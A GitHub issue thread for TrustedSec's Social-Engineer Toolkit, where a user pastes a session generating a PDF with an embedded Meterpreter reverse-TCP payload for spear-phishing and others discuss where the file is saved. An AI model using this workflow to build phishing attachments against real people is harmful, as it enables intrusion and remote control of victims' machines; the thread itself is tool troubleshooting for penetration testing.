search

trustedsec / social-engineer-toolkit

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.
10.85k stars 2.76k forks source link

All payloads get sent to the template.pdf directory. Where are my payloads? #223

Closed DuStyGSY closed 8 years ago

DuStyGSY commented 8 years ago

I have just downloaded and installed SET as the one that comes with kali keeps talking about bleeding edge repositories. As you can see I am using Version 7.0.6 and still this problem persists.

Here is my output;

---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Version: 7.0.6 [---] [---] Codename: 'RemembRance' [---] [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---]

    Welcome to the Social-Engineer Toolkit (SET).
     The one stop shop for all of your SE needs.

 Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

         Visit: https://www.trustedsec.com

Select from the menu:

1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules

99) Return back to the main menu.

set> 1

The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social-Engineering Template

99) Return to Main Menu

set:phishing>2

Select the file format exploit you want. The default is the PDF embedded EXE.

       ********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>13

[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.

1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack

set:payloads>2

1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2 set> IP address for the payload listener (LHOST): 192.168.21.105 set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Payload creation complete. [] All payloads get sent to the template.pdf directory [-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

set:phishing>test.pdf

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

What do you want to do:

  1. E-Mail Attack Single Email Address
  2. E-Mail Attack Mass Mailer
  3. Return to main menu.

set:phishing>99

Thank you for shopping with the Social-Engineer Toolkit.

Hack the Gibson...and remember...hugs are worth more than handshakes.

trustedsec commented 8 years ago

Under the option to keep the filename or rename the file name why did you specify set:phishing>test.pdf instead of the option 1 or 2?

trustedsec commented 8 years ago

The file is stored under /root/.set/.

root@stronghold:~# ls -al /root/.set/ total 80 drwxr-xr-x 2 root root 4096 Apr 20 11:27 . drwx------ 38 root root 4096 Apr 4 22:39 .. -rw-r--r-- 1 root root 47 Apr 20 11:27 payload.options -rw-r--r-- 1 root root 70 Apr 20 11:24 set.options -rw-r--r-- 1 root root 60539 Apr 20 11:27 template.pdf -rw-r--r-- 1 root root 228 Apr 20 11:27 template.rc

DuStyGSY commented 8 years ago

Hi thanks for the reply.

I just realised what I did there and ran back through the options. Thats why I couldn't see my pdf file because I hadn't selected 2.

Cheers for your reply all sorted now.

firozmahamud29 commented 6 years ago

if I'm close the terminal and want to use the file again or any victim open the file after few days how can I check that???

cahsun147 commented 2 years ago

set:payloads> Port to connect back on [443]: 1337 [!] Metasploit has not been previously run on the system. This means that the msf directories haven't been created yet. Running Metasploit for you. [*] Waiting 10 seconds for the directories to be created... [!] Please exit out of SET and type 'msfconsole' from the command prompt and launch SET again. Can't find the msf4 directory.

How to fix

ghost commented 1 year ago

Hi, how do i get the .pdf out of there? i cant lol

mansoorbarri commented 1 year ago

Hi, how do i get the .pdf out of there? i cant lol

su -

then locate to the /root/.set/

cd /root/.set/

then copy it to somewhere in your user folder, in this case i'm going with the downloads folder and my username is "anar" 

mv <filename>.pdf /home/anar/Downloads

where is your pdf file name from setoolkit

ghost commented 1 year ago

Thanks!

business247 commented 1 year ago

yep thx very much for the quick tuto!

bypasssss commented 1 year ago

Merci!

hey do you wanted to work in collaboration with me?

Dlion4636 commented 1 year ago

Yes of course

On Sat, Feb 4, 2023, 8:15 AM bypasssss @.***> wrote:

Merci!

hey do you wanted to work in collaboration with me?

— Reply to this email directly, view it on GitHub https://github.com/trustedsec/social-engineer-toolkit/issues/223#issuecomment-1416472330, or unsubscribe https://github.com/notifications/unsubscribe-auth/A4727SSLCGMPKBJZNLIQOPLWVV7P5ANCNFSM4CBPGRZQ . You are receiving this because you are subscribed to this thread.Message ID: @.***>

mserra0 commented 1 year ago

hello I have a problem, Idont know wher my pdf payloads are, Im trying to find the template.whatever file

kurogai commented 1 year ago

Does this works with android?

mansoorbarri commented 1 year ago

hello I have a problem, Idont know wher my pdf payloads are, Im trying to find the template.whatever file

https://github.com/trustedsec/social-engineer-toolkit/issues/223#issuecomment-1364383440

mansoorbarri commented 1 year ago

Does this works with android?

i hope so although I haven't tried on android

bypasssss commented 1 year ago

hey Barri

Le lun. 19 juin 2023 à 14:41, Mansoor Barri @.***> a écrit :

Does this works with android?

i hope so although I haven't tried on android

— Reply to this email directly, view it on GitHub https://github.com/trustedsec/social-engineer-toolkit/issues/223#issuecomment-1597118365, or unsubscribe https://github.com/notifications/unsubscribe-auth/A5VEDJIF24XJK5LEP6GDBSTXMBCGBANCNFSM4CBPGRZQ . You are receiving this because you commented.Message ID: @.***>